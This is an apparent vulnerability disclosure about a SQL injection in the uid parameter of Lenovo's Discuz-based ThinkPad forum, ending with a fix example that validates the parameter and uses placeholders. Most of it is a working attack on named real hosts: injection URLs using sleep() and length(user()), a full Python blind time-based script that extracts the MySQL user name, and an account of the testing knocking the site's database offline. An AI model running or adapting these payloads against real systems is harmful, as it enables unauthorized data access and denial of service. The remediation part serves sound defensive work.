Lenovo's Discuz Forum MySQL injection script
MySQL injection in a Lenovo Discuz forum, tested several times.
Script for guessing values through the injection.
The injection appears to have been introduced by Lenovo's secondary development of Discuz. ThinkPad Forum:
http://lenovobbs.lcf5.lenovo.com.cn/forum.php?mod=person_thread&uid=aa
The uid parameter can be injected.
When the preceding address is accessed, an error is returned:
Discuz! Database Error(1054) Unknown column 'aa' in 'where clause'select * from forum_thread where authorid in(aa)
We can see that aa is enclosed in parentheses.
Access:
http://thinkbbs.lenovo.com.cn/forum.php?mod=person_thread&uid=100) or (sleep(1)
The page hangs while loading, which indicates that sleep() works.
However, some SQL keywords such as select are filtered, so error-based injection is limited:
http://lenovobbs.lcf5.lenovo.com.cn/forum.php?mod=person_thread&uid=select(100)
Guess the length of user():
http://thinkbbs.lenovo.com.cn/forum.php?mod=person_thread&uid=length(user())
It is 29.
The following figure shows the first few characters of the MySQL user:
bbs_u@len
However, when I repeated the guesses, I found that the entire website became unresponsive, including the homepage...
Discuz! Database Error(1203) notconnect
This means the database was brought down by too many concurrent sleep() calls.
In fact, I don't need to use the sleep function at all; I can read the user_id directly from the page to complete the guess... I just like blind injection too much and insist on guessing the ASCII codes blindly...
import httplib
import string
import urllib

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Character set to test for each position of the MySQL user name.
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.', '-', '\\', ' ']

print 'start to retrieve MySQL user:'
user = ''
# user() was found to be 29 characters long; test one position at a time.
for i in range(1, 30, 1):
    for payload in payloads:
        try:
            conn = httplib.HTTPConnection('thinkbbs.lenovo.com.cn', timeout=10)
            # sleep(...) only fires when the character at position i matches,
            # so a request that times out means the guess was right.
            url = "/forum.php?mod=person_thread&uid=" + urllib.quote(
                "sleep(ascii(mid(user()from(%s)for(1)))=%s)" % (i, ord(payload)))
            conn.request(method='GET', url=url, headers=headers)
            html_doc = conn.getresponse().read()
            conn.close()
            print '.',
        except:
            # The request timed out: record the character and move on.
            user += payload
            print '\n[in progress]', user
            break
print '\nMySQL user is', user
Solution:
Filter the uid parameter before it reaches the query.
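The following is an added example, not Discuz's or Lenovo's code, showing how the uid parameter of forum.php?mod=person_thread could be filtered: the value is accepted only if it is a comma-separated list of unsigned integers, and the IN (...) clause is then built from placeholders rather than by string concatenation. The table name and columns, and the use of sqlite3 as a stand-in for MySQL, are assumptions for the demonstration.

```python
import re
import sqlite3

# Accept only unsigned integers separated by commas, e.g. "100" or "100,7".
UID_LIST = re.compile(r"\d{1,10}(,\d{1,10})*")


def parse_uid(raw):
    """Return a list of ints, or None when the parameter is not a plain
    comma-separated list of unsigned integers (so "aa", "length(user())"
    and "100) or (sleep(1)" are all rejected before any SQL is built)."""
    if raw is None or UID_LIST.fullmatch(raw) is None:
        return None
    return [int(x) for x in raw.split(",")]


def threads_by_author(conn, raw_uid):
    """Hardened replacement for the concatenated
    'select * from forum_thread where authorid in(<uid>)' seen in the
    page's error message. Returns None for rejected input, otherwise rows."""
    ids = parse_uid(raw_uid)
    if ids is None:
        # Reject silently; never echo the raw value into SQL or an error page.
        return None
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT tid, authorid FROM forum_thread WHERE authorid IN (%s)" % placeholders
    return conn.execute(sql, ids).fetchall()


def demo_db():
    """Constructed in-memory table standing in for forum_thread (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE forum_thread (tid INTEGER, authorid INTEGER)")
    conn.executemany("INSERT INTO forum_thread VALUES (?, ?)",
                     [(1, 100), (2, 100), (3, 7)])
    return conn


if __name__ == "__main__":
    db = demo_db()
    for raw in ("100", "100,7", "aa", "100) or (sleep(1)", "length(user())"):
        print(repr(raw), "->", threads_by_author(db, raw))
```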